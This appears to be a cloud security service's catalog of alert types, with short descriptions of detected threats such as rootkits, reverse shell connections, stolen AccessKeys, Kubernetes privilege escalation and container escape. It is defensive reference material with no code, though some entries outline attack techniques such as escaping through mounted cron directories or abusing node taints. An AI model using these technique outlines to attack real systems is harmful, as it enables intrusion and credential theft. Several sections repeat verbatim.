The detection model found a hacking tool on your server. Hacking tools are used by attackers during an intrusion for privilege escalation, stealing sensitive data, uninstalling security software, or as a backdoor program implanted in the system after an intrusion.

Rootkit

The detection model found a rootkit on your server. A rootkit is a malicious module implanted at the system's core to hide its own or other malicious programs' traces.

Rootkit kernel module

The detection model found a rootkit on your server. A rootkit is a malicious module implanted at the system's core to hide its own or other malicious programs' traces.

Highly suspicious program

The detection model found a suspicious program running on your server. A suspicious program typically has some malicious code characteristics or highly suspicious behaviors and is not yet clearly classified. You need to evaluate it based on the provided information.

Riskware

The detection model found riskware on your cloud host. Riskware is not necessarily a truly malicious program; it may be an ordinary software tool. However, it has some functions that could pose a threat to the host. If used by someone with malicious intent in a cyberattack, it could cause harm. Common riskware includes process management tools, system service management tools, and remote management tools. The specific situation needs to be judged by the user based on the information.

Downloader Trojan

The detection model found a downloader Trojan on your server. A downloader Trojan typically downloads and releases third-party programs such as malicious Trojans and adware.

Proxy tool

The detection model found a proxy tool on the host. Proxy tools are used by attackers for proxying and tunneling, often in scenarios of further server intrusion.

Engine test program

The detection model found an engine test program on the host. This program is often used to check if the virus detection engine is working properly.

Information-stealing tool

The detection model found an information-stealing tool on the host. Information-stealing tools are often used to steal various sensitive files and information from the host.

Scanner

The detection model found a scanner on the host. Scanners are often used by attackers to discover live hosts, open ports, and hosts with security risks such as vulnerabilities and weak passwords, often for further intrusion scenarios.

Ransomware

A suspicious file was found on your system disk. We recommend that you first confirm the legitimacy of the file and handle it.

Adware

The detection model found adware on your server. Adware is typically implanted in normal software, disrupting normal server use and consuming extra resources.

Obfuscated program

The detection model found an obfuscated program on your server. Advanced malware often obfuscates itself to evade detection.

Cracking program

The detection model found a cracking program on your server. The source of such cracking programs is unknown and may pose potential security risks.

Private server tool

The detection model found a private server tool on your server. Private server tools are generally used in game or cheat scenarios and may contain malicious code.

Reverse shell backdoor

Cloud scan (reverse shell backdoor).

Malicious document

The detection model identified a malicious document file. Malicious documents are used by attackers for phishing attacks, luring users to click and execute a malicious payload to gain control.

Alert name

Description

Unusual logon of a RAM user

This alert means that a RAM user under your account has logged in from an unusual location. This type of alert may occur when you change your logon location. If the logon request is not for your normal business needs, it means an attacker may have obtained the account's username and password.

Malicious IP address using an AccessKey

The system detected that a malicious IP address is using your AccessKey. If you confirm that this is not your own operation, disable and replace the AccessKey as soon as possible.

Suspicious access to OSS

This alert means that a user used an OSS tool to access your bucket abnormally. This could be because the calling IP address changed or the API call failed. Please confirm whether the source IP of the request and the tool's operation are part of normal business needs. Otherwise, an attacker may have gained control of your OSS bucket.

Anomalous command from Cloud Assistant

The detection model found that your cloud account called a command on your server through the Cloud Assistant OpenAPI, and the command's content is malicious. It is highly likely that an attacker has obtained your AccessKey to perform malicious operations.

Anomalous AccessKey call

The system detected an anomalous call behavior with your AccessKey.

ECS instance role credential called externally

The model detected that the Security Token Service (STS) temporary credentials for a role that you granted to an ECS instance are being called from an external IP address. This may indicate that the associated ECS instance has been compromised. An attacker may have stolen the STS temporary credentials for the role associated with the instance and is using them to make external calls. Alibaba Cloud does not recommend using these credentials on hosts other than the one that requested them. For more information about ECS instance roles, see Instance RAM roles.

Cloud Assistant registration hijacking

The system detected that another Alibaba Cloud account is installing Cloud Assistant on your ECS instance to achieve remote command control. Please confirm as soon as possible whether this is an operation by relevant O&M personnel and check the server for other anomalies.

Hacking tool using an AK

Your AccessKey (AK) was detected being used by a hacking tool. Please confirm as soon as possible whether this is normal user behavior.

ECS role credential called by another Alibaba Cloud account

The model detected that the Security Token Service (STS) temporary credentials for the role assigned to your ECS instance are being invoked from an external IP address. This may indicate that the ECS instance has been attacked. An attacker may have stolen the STS temporary credentials of the role associated with the instance and is using them to make external calls. Alibaba Cloud does not recommend that you use these credentials on hosts other than the one that requested them. For more information about ECS instance roles, see Instance RAM roles.

Anomalous call to a sensitive API by an ECS role credential

The model detected that your ECS instance role performed a sensitive API operation. Please confirm the identity of the caller's IP address as soon as possible and verify whether the activity is part of normal business behavior. If the IP belongs to an ECS under your own assets, you also need to check for the risk of compromise. In an intrusion, an attacker may steal the ECS instance's role credential by compromising a server or website and use this identity to make such sensitive API calls for further attacks.

Suspicious identity calling a sensitive API

The model detected that your account made a relatively sensitive API call, and the calling IP is not from a common geographical location. You need to verify the caller's identity and whether the related operation is reasonable to avoid the risk of AccessKey (AK) leakage.

Anomalous traversal of ECS resources

You were detected traversing resource instances across various regions, and the calling IP is not from a common geographical location. You need to verify the caller's identity and whether the related operation is reasonable to avoid the risk of AccessKey (AK) leakage.

Anomalous traversal of RDS resources

The model detected that you are traversing resource instances across various regions, and the calling IP is not from a common geographical location. You need to verify the caller's identity and whether the related operation is reasonable to avoid the risk of AccessKey (AK) leakage.

Anomalous traversal of OSS access permissions

The model detected that you are traversing the access control lists (ACLs) of multiple OSS buckets, and the calling IP is not from a common geographical location. You need to verify the caller's identity and whether the related operation is reasonable to avoid the risk of AccessKey (AK) leakage.

Anomalous creation of a high-privilege sub-account

This account created a RAM user with admin privileges and enabled web console logon. Attackers often use this method to implant a backdoor for subsequent intrusion operations. Quickly investigate whether the creation of this sub-account was a legitimate operation by relevant personnel.

Anomalous traversal of multiple sub-account permissions

The model detected that you are traversing the permission policies of multiple sub-accounts, and the calling IP is not from a common geographical location. You need to verify the caller's identity and whether the related operation is reasonable to avoid the risk of AccessKey (AK) leakage.

Anomalous traversal of a single sub-account's permissions

The model detected that you are traversing the permission policies of a sub-account and its user groups, and the calling IP is not from a common geographical location. You need to verify the caller's identity and whether the related operation is reasonable to avoid the risk of AccessKey (AK) leakage.

Anomalous traversal of role permissions

The model detected that you are traversing the permission policies of multiple roles in the account, and the calling IP is not from a common geographical location. You need to verify the caller's identity and whether the related operation is reasonable to avoid the risk of AccessKey (AK) leakage.

Anomalous opening of public network access to a database

The model detected that you changed a database to be accessible from the public network and added an IP whitelist, and the calling IP is not from a common geographical location. You need to verify the caller's identity and whether the related operation is reasonable to avoid the risk of AccessKey (AK) leakage.

Anomalous creation of a high-privilege role

To use a role, it is usually sufficient to grant it permissions for a specific service. It is not recommended to directly grant administrator privileges to a role. Please verify and confirm as soon as possible whether the creation of this role is a normal business requirement.

Anomalous permission probing behavior

The model detected that you are traversing the API call permissions of multiple cloud products, which resembles the automated calling behavior of a hacking tool. You need to verify the caller's identity and whether the related operation is reasonable as soon as possible to avoid the risk of AccessKey (AK) leakage.

RAM user logs into the console and performs sensitive operations

A RAM user was detected enabling web console logon and performing relatively sensitive operations in the console.

Anomalous command from Cloud Assistant

The detection model found that your cloud account called a command on your server through the Cloud Assistant OpenAPI, and the command's content is malicious. It is highly likely that an attacker has obtained your AccessKey to perform malicious operations.

Alert name

Description

Proactive connection to a malicious download source

The detection model found through HTTP traffic that your server is attempting to access a suspicious malicious download source. This may be an attacker downloading malicious files from a remote server through a weak password or command execution vulnerability, which endangers server security.

Suspected sensitive port scanning behavior

The detection model found that a process on your server initiated too many network requests to sensitive ports in a short period, which is suspected to be port scanning behavior.

Anomalous network connection in Windows

The detection model found that the network connection behavior of a process on your system is anomalous. It is very likely related to a virus, Trojan, or hacking behavior.

Reverse shell outbound network connection

Security Center detected a suspected reverse shell outbound network connection. An attacker used this method to establish a reverse network connection with their own server, through which arbitrary commands can be executed. Investigate promptly. If it is an O&M operation or a normal business function, you can ignore the alert or mark it as a false positive.

Suspicious port listening

Suspicious port listening.

Internal network scan

The detection model found a process on your server that initiated suspected scanning behavior against specified ports of multiple internal IP addresses in a short period. This may be an attacker attempting lateral movement after an intrusion.

Manual call to a container API

Security Center found suspicious manual access to a container API. In scenarios where the container service has not enabled authentication and authorization, an attacker can access the container API to obtain container information, create containers, execute malicious commands in containers, and upload malicious images. There is also a chance that this is a normal manual operation by O&M. Investigate promptly.

Alert name

Detection details

Malicious script file found

The detection model found a malicious script file on your server. This file is highly likely to have been implanted by an attacker after successfully compromising the server. We recommend that you check the legitimacy of the file's content based on the malicious script's tag and handle it.

Malicious script code execution

The detection model found that malicious script code such as Bash, PowerShell, or Python is being executed on your server.

Suspicious download behavior found

The detection model found suspicious download behavior on your server. This file may be a command operation executed by an attacker after successfully compromising the server. We recommend that you check the legitimacy of this command execution and handle it.

Suspicious script file found

The detection model found a suspicious script file on your server. This file may have been implanted by an attacker after successfully compromising the server. We recommend that you check the legitimacy of the file's content based on the malicious script's tag and handle it.

Suspicious script code execution

The detection model found that suspicious script code such as Bash, PowerShell, or Python is being executed on your server.

Malicious script

SCRIPT_agentless.

File containing malicious code

The detection model found a malicious script file on your server. This file is highly likely to have been implanted by an attacker after successfully compromising the server. We recommend that you check the legitimacy of the file's content based on the malicious script's tag and handle it.

File containing suspicious code

The detection model found a malicious script file on your server. This file is highly likely to have been implanted by an attacker after successfully compromising the server. We recommend that you check the legitimacy of the file's content based on the malicious script's tag and handle it.

Alert name

Description

Anomalous code resident in memory

Security Center detected malicious code in the memory space of this process. This indicates that a legitimate process may have been injected with malicious instructions after startup, or the process file itself is malicious.

We recommend that you take the following actions:

1. Check the process file. If it is not a legitimate file, kill the process and quarantine the file. If it is a legitimate process, kill the process without affecting normal business.

2. In conjunction with other alert information on this machine, comprehensively assess the potential impact of this intrusion event on the business and take other response measures.

3. Try to analyze the cause of this intrusion event and fix the security vulnerabilities.

Backdoor process

The detection model found a suspicious process that appears to be a backdoor on your server. This may be a persistence mechanism left by an attacker to maintain access.

Auto-start backdoor

Security Center detected an anomalous auto-start item on your host, which is highly likely to have been implanted by malware or an attacker to maintain the persistence of a malicious program. If these auto-start items are not handled, the malicious program is very likely to be implanted again. Therefore, we recommend that you use "Virus Defense" to perform a comprehensive scan and cleanup of the host, or handle it manually based on the details in the alert.

Anomalous process persistence

The detection model found an anomalous process among the currently running programs on your server. It may be a malicious program or a normal program that has loaded malicious code.

Malicious startup item script

The detection model found that some auto-start item files on your server are suspicious. They may be persistence mechanisms created by malware or an attacker through scheduled tasks or auto-start scripts.

Hidden process

Security Center detected that this process is a hidden process, which cannot be displayed by conventional process viewing tools. Malware or attackers use various techniques to hide malicious program processes. The host is very likely to have been infected with a rootkit backdoor.

SSH public key backdoor

The detection model found an anomalous SSH logon public key on your server. This SSH public key has a history of being added to compromised servers by worms or attackers to maintain access.

Cobalt Strike remote control Trojan

A Cobalt Strike remote control backdoor was detected in the memory of this process.

It is possible that an attacker used process injection techniques to inject malicious code across processes into this process. Even if the original file of this process is normal, it will execute malicious code after being injected.

It is also possible that the program itself is malicious.

We recommend that you take the following measures:

1. Check the process file. If it is not a legitimate file, kill the process and quarantine the file. If it is a legitimate process, kill the process without affecting normal business.

2. In conjunction with other alert information on this machine, comprehensively assess the potential impact of this intrusion event on the business and take other response measures.

3. Try to analyze the cause of this intrusion event and fix the security vulnerabilities.

Hidden kernel module

The detection model found a hidden kernel module on your server. It is highly likely to be a rootkit backdoor implanted by an attacker or malware to maintain system privileges and hide other malicious activities.

Backdoor resident in web application memory

Suspicious code or data was detected in the web application process on the host. This could be intermediate code generated when a vulnerability is exploited or a backdoor installed by an attacker to maintain access. This type of backdoor exists only in the process memory and does not require a file to be saved on the disk. We recommend that you first fix the web application vulnerability and restart the web application to disable the backdoor, and at the same time, pay attention to other related alerts on the host. If you are sure that this alert is a false positive, you can choose to ignore or whitelist the alert.

Kerberos ticket injection attack

Kerberos ticket injection attack.

WMI event subscription persistence attack

WMI event subscription persistence attack.

Skeleton Key domain controller persistence attack

Skeleton Key domain controller persistence attack.

Process path spoofing

Process path spoofing.

Anomalous registry key

The detection model found a suspicious registry configuration item on your server. Malware often modifies certain key registry configurations to run persistently or interfere with normal security protection.

Anomalous library file loading

Anomalous library file loading.

Process executable image tampering

Process executable image tampering.

SID History injection attack

SID History injection attack.

Dynamic-link library function hijacking

Dynamic-link library function hijacking.

Anomalous .NET module loaded into memory

Anomalous .NET module loaded into memory.

Anomalous scheduled task

Anomalous scheduled task.

Anomalous scheduled task

Anomalous scheduled task.

Anomalous thread execution

Anomalous thread execution.

Process hiding behavior

Process hiding behavior.

Anomalous code found in web application memory

Anomalous code found in web application memory

Anomalous service in Linux

Anomalous service in Linux.

Anomalous service in Windows

Anomalous service in Windows.

System base library file hijacking

System base library file hijacking.

Process runtime function hijacking

Process runtime function hijacking.

Anomalous startup script in Linux

Anomalous startup script in Linux.

Cobalt Strike remote control Trojan

A Cobalt Strike remote control backdoor was detected in the memory of this process.

It is possible that an attacker used process injection techniques to inject malicious code across processes into this process. Even if the original file of this process is normal, it will execute malicious code after being injected.

It is also possible that the program itself is malicious.

We recommend that you take the following measures:

1. Check the process file. If it is not a legitimate file, kill the process and quarantine the file. If it is a legitimate process, kill the process without affecting normal business.

2. In conjunction with other alert information on this machine, comprehensively assess the potential impact of this intrusion event on the business and take other response measures.

3. Try to analyze the cause of this intrusion event and fix the security vulnerabilities.

Kerberos ticket injection attack

Kerberos ticket injection attack.

Anomalous service in Linux

Anomalous service in Linux.

Anomalous scheduled task

Anomalous scheduled task.

SID History injection attack

SID History injection attack.

Skeleton Key domain controller persistence attack

Skeleton Key domain controller persistence attack.

Anomalous service in Windows

Anomalous service in Windows.

Anomalous scheduled task

Anomalous scheduled task.

WMI event subscription persistence attack

WMI event subscription persistence attack.

Dynamic-link library function hijacking

Dynamic-link library function hijacking.

Backdoor process

The detection model found a suspicious process that appears to be a backdoor on your server. This may be a persistence mechanism left by an attacker to maintain access.

Anomalous .NET module loaded into memory

Anomalous .NET module loaded into memory.

Anomalous code resident in memory

Security Center detected malicious code in the memory space of this process. This indicates that a legitimate process may have been injected with malicious instructions after startup, or the process file itself is malicious.

We recommend that you take the following actions:

1. Check the process file. If it is not a legitimate file, kill the process and quarantine the file. If it is a legitimate process, kill the process without affecting normal business.

2. In conjunction with other alert information on this machine, comprehensively assess the potential impact of this intrusion event on the business and take other response measures.

3. Try to analyze the cause of this intrusion event and fix the security vulnerabilities.

Anomalous library file loading

Anomalous library file loading.

Anomalous registry key

The detection model found a suspicious registry configuration item on your server. Malware often modifies certain key registry configurations to run persistently or interfere with normal security protection.

Anomalous thread execution

Anomalous thread execution.

System base library file hijacking

System base library file hijacking.

Process executable image tampering

Process executable image tampering.

Process path spoofing

Process path spoofing.

Process runtime function hijacking

Process runtime function hijacking.

Process hiding behavior

Process hiding behavior.

Anomalous terminal configuration file in Linux

Anomalous terminal configuration file in Linux.

Alert name

Description

System file tampering

The detection model found a process on your server attempting to modify or replace system files. This may be an attacker trying to evade detection, hide a backdoor, or achieve other objectives by replacing system files. Promptly confirm whether the system file in the alert on your server is a genuine system file.

System file moving

The detection model found an upstream process on your server attempting to move system files. This may be an attacker trying to bypass some detection logic by moving system files that are monitored by security software during an intrusion.

Suspicious tampering of the Linux shared library preload configuration file

The detection model found that the shared library preload configuration file on your server is being suspiciously tampered with.

Alert name

Description

Suspicious command executed by calling the Kubernetes API to enter a container

Security Center detected the behavior of calling the Kubernetes API to enter a container and execute a suspicious command. This is common in lateral movement attacks across various scenarios, such as between containers or between a node and a container. There is also a chance that this is a normal business or O&M requirement.

Malicious image pod startup

A pod containing a malicious image was detected starting in your Kubernetes cluster. This is common when the image contains malicious programs such as backdoors or mining programs.

Kubernetes service account lateral movement

The detection model found that one of your service accounts requested permissions outside the historical baseline or triggered multiple authentication failures. This usually occurs when an attacker intrudes into a pod and uses the service account credential obtained from the compromised server to attack the API server. Investigate promptly.

Successful authentication of a Kubernetes anonymous user

A successful anonymous logon event was detected. It is not recommended to allow anonymous users to access important resources in a business cluster. The risk is extremely high when a cluster is exposed to the public network and allows anonymous access. This is common when an attacker uses anonymous authentication to enter and control the Kubernetes API server to issue tasks. Promptly investigate whether this operation was triggered by a trusted user and restrict the access permissions of anonymous users.

Anomalous access to Kubernetes Secrets

The detection model found that Secrets are being enumerated in your Kubernetes cluster. This may mean that an attacker is stealing sensitive information from Kubernetes Secrets after your cluster has been compromised. Promptly investigate whether this operation was triggered by a trusted program or administrator.

Suspicious Kubernetes operation sequence

Security Center detected that an account in your Kubernetes cluster executed a series of high-risk commands outside the baseline. Please check whether this command was executed by trusted O&M personnel. Otherwise, your cluster is very likely to have been compromised by an attacker. If it is confirmed to be a trusted behavior, you can add it to the whitelist to filter out subsequent alerts for similar behaviors.

Kubernetes user bound to an administrator role

Security Center detected that a user in your Kubernetes cluster is being bound to a high-privilege system role (ClusterRole). Please confirm that this action was triggered by O&M personnel or a system component. Otherwise, your server may have been compromised by an attacker who is using this method to leave a backdoor account. If you confirm it is a false positive, you can ignore such alerts by adding it to the whitelist.

Suspected Kubernetes service man-in-the-middle attack (CVE-2020-8554)

In a Kubernetes cluster, a user can create a service to hijack cluster traffic and forward it to any external IP to steal information. Security Center detected that the ExternalIP in a service created in your Kubernetes cluster specifies an external IP. This matches the exploitation characteristics of the Kubernetes man-in-the-middle attack vulnerability (CVE-2020-8554).

Node sensitive directory mounting

Security Center found that your pod mounted a sensitive directory or file at startup, which poses a container escape risk. Once the pod is compromised, an attacker has a chance to escape from the pod and control the node by mounting sensitive files. It is recommended to minimize the configuration of pods mounting sensitive host directories, such as the root directory, scheduled task configuration directory, and system service configuration directory. If it is a necessary business requirement with controllable risks, you can add it to the whitelist and ignore this alert.

Suspicious request to the Kubernetes API server

A suspicious request to the Kubernetes API server was detected. See the alert details for the specific anomalous reason. There is also a chance that this is a normal business operation. You can focus on checking the source IP of the operation request, the User Agent used, the resource being operated on, and the user who initiated the request to determine if it is normal. To view the complete Kubernetes API server request log, you can use the auditID field in the alert details to search based on the Kubernetes audit log SLS information in the alert details.

Kubernetes cluster user bound to a high-privilege role

A Kubernetes cluster user was detected being bound to a high-privilege role. High privilege refers to the permission to read and operate on important resources in a namespace or the entire cluster, such as cluster administrator, reading all secrets in a namespace, creating pods and logging into pods to execute commands, and creating high-privilege roles. When an attacker obtains the credentials of a high-privilege user, they can use such permissions for lateral movement or privilege escalation within the cluster, ultimately achieving control of the entire cluster. A common attack scenario is when a web application's service account is granted excessive privileges. An attacker enters a pod through a web application vulnerability, reads and uses the service account credential to further access and control other cluster resources.

Anomalous token creation by a service account

Obtaining a token account is usually initiated by a real user of the cluster. A service account is a built-in object in Kubernetes that is associated with a specific namespace and can be used by processes in a pod to interact with the Kubernetes API service. When a service account attempts to obtain another account's token, a privilege escalation may occur.

Service account modifies its own cluster role permissions

The set of cluster role permissions owned by an application's service account is generally not modified by the service account itself after creation. Therefore, when a service account requests to modify the permissions of the cluster role it is bound to, it usually represents a privilege escalation.

Service account modifies its bound cluster role

An application's service account usually does not modify the cluster role it is bound to. Therefore, when a service account creates and binds its role, it usually represents a privilege escalation.

Service account impersonates another user principal to request resources

An application's service account usually does not need to impersonate another user principal to request resources. Therefore, when a service account impersonates another user principal to make a request, a privilege escalation may occur.

Creating and configuring service accounts for system component pods

Cluster system component service accounts usually have high privileges and should not be referenced by other workloads. Therefore, when a service account creates a pod that is configured with a system component service account, it usually represents a privilege escalation.

Suspicious request to probe its own permission set

Workloads in a cluster rarely initiate requests to check their own service account permissions. Therefore, when a service account requests to obtain the set of permissions it owns, it may indicate that the service account has been controlled by an attacker.

Node identity obtains a cluster secret

The kubelet certificate of a cluster node has the permission to obtain secrets. This capability can be abused by an attacker to obtain sensitive secret resources in the cluster. Therefore, when a node identity requests to obtain a secret, it usually represents a privilege escalation.

Service account creates a node proxy resource to execute a command

A node proxy resource can be used to execute commands in a pod, but business workloads in a cluster generally do not need to use this method. Therefore, when a service account executes a command in a pod as a node proxy resource, it usually represents a privilege escalation.

Service account steals another node's pod

A taint is a Kubernetes scheduling feature used to restrict whether a pod can be scheduled to a certain node. An attacker, having controlled a node, can mark nodes other than the compromised one as unschedulable, causing the target pod to be scheduled to the compromised node to further obtain its credentials. When a service creates taints for many nodes, a privilege escalation may occur.

Service account directly accesses the kubelet listening port

Port 10250 is the port for communication between the kubelet and the API server. Business workloads within the cluster usually do not use a service account to access this port. When a service account directly accesses the kubelet listening port and requests a specific resource, it usually represents a privilege escalation.

Service account creates a temporary container to enter a pod

An ephemeral container is a method that allows developers to debug a running pod. Developers enter the target account's namespace by creating an ephemeral container. Such operations should not be initiated by a service account. When a service account requests to create an ephemeral container, it usually means an attacker is using that identity to attempt to enter another pod for privilege escalation.

Alert name

Description

Backdoor account

An anomalous account was detected in the system. An attacker or malicious program may create a new account or activate a guest account to maintain access. If this is not an account used for normal business needs, we recommend that you log in to the host to handle it.

Alert name

Description

Webshell file found

Scores the threat level based on file behavior to identify suspicious files with dangerous functions and features. These files may have been implanted by an attacker after an intrusion, but they could also be normal files with suspicious code or log files (an alert may also be triggered if logs are stored in a web path). The administrator needs to confirm their legitimacy.

Alert name

Description

Web vulnerability exploit

Web vulnerability exploit.

Host vulnerability exploit

Host vulnerability exploit.

Suspected escape by file tampering

Security Center detected the action of opening an important file in "write mode". This is common in scenarios of escaping from a container to the host by tampering with the file. You can focus on investigating whether the process, the operated file, and the file's opening properties originate from normal business operations. If it is an O&M operation or a normal business function, ignore the alert or mark it as a false positive.

TOCTOU-type vulnerability exploit

Security Center detected suspected time-of-check-to-time-of-use (TOCTOU) vulnerability exploitation behavior. See the alert details for the vulnerability number. This type of vulnerability is commonly used for container escape, privilege escalation, and more. We recommend that you check if the related software is within the scope of the vulnerability and fix the vulnerability promptly. There is also a small probability of false positives. Please mark it as a false positive or add it to the whitelist.

Container starts by mounting a sensitive host directory

Security Center found that a container has risky behavior, such as starting in privileged mode or mounting a sensitive directory or file at startup. In this scenario, an attacker has a chance to escape to the host by exploiting the dangerous configuration. It is recommended not to start in privileged mode and not to configure the pod to mount sensitive host directories, such as the root directory, scheduled task configuration directory, or system service configuration directory.

Alert name

Description

Suspicious file upload

The detection model found suspicious file upload traffic in your server's traffic, and a related suspicious file has landed or been modified on the host. Please make a further judgment based on the alert details. The recommended investigation steps are as follows: 1) Check for any associated webshell file alerts. 2) Check if the file upload point in the traffic can be maliciously exploited. 3) Check if the file on the host is a known active behavior such as an administrator's active upload, creation, modification, web service update, or backup. If so, please ignore the alert or add a path whitelist. 4) If it is confirmed to be a malicious file upload, handle the malicious file on the machine and harden the file upload point. A whitelist of file names is a recommended hardening measure.

Web application command execution

The detection model found malicious web attack traffic in your server's traffic, and a corresponding command was executed on the endpoint. This means your service may have a vulnerability that has been exploited by an attacker. Please make a further judgment based on the alert details.

Mining pool communication traffic

The detection model found traffic communicating with a mining pool IP on your server. Your server may have been compromised by an attacker and used for mining.

Tunnel proxy communication

The detection model found suspicious tunnel proxy communication traffic in your server's traffic. Please make a further judgment based on the alert details.

Reverse shell traffic

The detection model found malicious reverse shell traffic in your server's traffic. An attacker used this method to establish a reverse network connection with their own server, through which arbitrary commands can be executed. Please make a further judgment based on the alert details.

Backdoor communication traffic

The detection model found malicious backdoor communication traffic in your server's traffic. An attacker used this method to establish a remote control channel with their own server. Please make a further judgment based on the alert details.

Java deserialization attack

The detection model found malicious Java deserialization attack traffic in your server's traffic, and the Java process has a suspicious outbound network connection or has executed a suspicious command. This means your service may have a vulnerability that has been exploited by an attacker. Please make a further judgment based on the alert details.

DNS-log attack

The detection model found malicious DNS-log attack traffic in your server's traffic, and the server accessed the DNS-log domain. This means your service may have a vulnerability that has been exploited by an attacker. Please make a further judgment based on the alert details.

Alert name

Description

High-risk system call

A key system call commonly used in privilege escalation and escape behaviors that exploit kernel vulnerabilities.

Escape by exploiting a vulnerability or misconfiguration

Commonly seen when a container is started with high privileges or mounts a pseudo file system, which allows an attacker to use system mechanisms like core_pattern or cgroup inside the container to escape.

Modifying a host user configuration file

Commonly seen when a container starts by mounting a system user configuration file like /etc/passwd or the SSH service configuration directory, which allows an attacker to gain host node user privileges by modifying such files from within the container.

Escaping by writing to a high-risk host directory

Commonly seen when a container starts by mounting system scheduled task directories, such as /etc/crontab, auto-start task directories, such as /etc/init.d, trigger-based task directories, such as /etc/profile, or Kubernetes static pod configuration directories. An attacker can write malicious code to these directories, which is then automatically executed by the host to gain privileges.

Running a container escape tool

Security Center detected an escape tool starting inside a container. This is common when an attacker, after compromising a container, attempts to break the isolation between the container and the host node to gain access control of the host.

Alert name

Detection details

Non-image program startup

Security Center detected the startup of a non-image program. This is common when an executable program not included in the original image, such as a backdoor Trojan, is installed while the container is running. There is also a chance that this is a normal business installation requirement. Please handle it promptly.

File defense

File defense.

Non-image program startup blocking

Security Center detected the startup of a non-image program. This is common when an executable program not included in the original image, such as a backdoor Trojan, is installed while the container is running. There is also a chance that this is a normal business installation requirement. Please handle it promptly.

Alert name

Detection details

Cluster starts a malicious image from the Internet

The cluster started a malicious image from the Internet.

Starting a cluster with unscanned images

The cluster was started without an image scan.

Cluster starts an image with vulnerabilities

The cluster started an image that contains vulnerabilities.

Cluster starts an image with malicious files

The cluster started an image that contains malicious files.

Cluster starts an image that failed a baseline check

The cluster started an image that failed a baseline check.

Cluster starts an image with sensitive files

The cluster started an image that contains sensitive files.

Cluster starts an image with risky build instructions

The cluster started an image that contains risky build instructions.

Alert name

Detection overview

System startup component trust event

Detects the trusted status of ECS trusted instances and handles related abnormal statuses. For more information, see Using Trusted Instances.

Alert name

Description

DDoS

DDoS flood attack.

Security Center client is abnormally offline

The detection model found that the main process of the Security Center client, AliYunDun, on your server went offline and did not come back online within a certain period, which triggered an alert. This could be a temporary phenomenon due to network instability, or it could be that the Security Center client was forcibly uninstalled due to a malicious cyberattack. Please log on to the server to confirm whether the Security Center client process is running. If not, please start it promptly.

Security Center client on a non-Alibaba Cloud host is abnormally offline

The detection model found that the main process of the Security Center client, AliYunDun, on your server went offline and did not come back online within a certain period, which triggered an alert. This could be a temporary phenomenon due to network instability, or it could be that the Security Center client was forcibly uninstalled due to a malicious cyberattack. Please log on to the server to confirm whether the Security Center client process is running. If not, please start it promptly.